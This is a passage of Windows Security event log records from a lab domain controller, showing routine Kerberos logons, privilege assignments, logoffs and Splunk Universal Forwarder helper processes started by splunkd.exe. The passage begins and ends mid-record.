ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264030
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A1504
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51776
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264029
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A1504
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264040
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xeb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264042
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x178c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264041
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264043
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1544
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264044
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1854
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264046
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264045
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264047
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A16AE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264050
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A4F19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264049
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A4F19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51789
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264048
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A4F19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264051
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264053
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264052
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x344
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264054
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264056
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264055
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1718
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264057
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x141c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264060
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A98A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264059
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A98A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51802
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264058
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A98A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264061
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
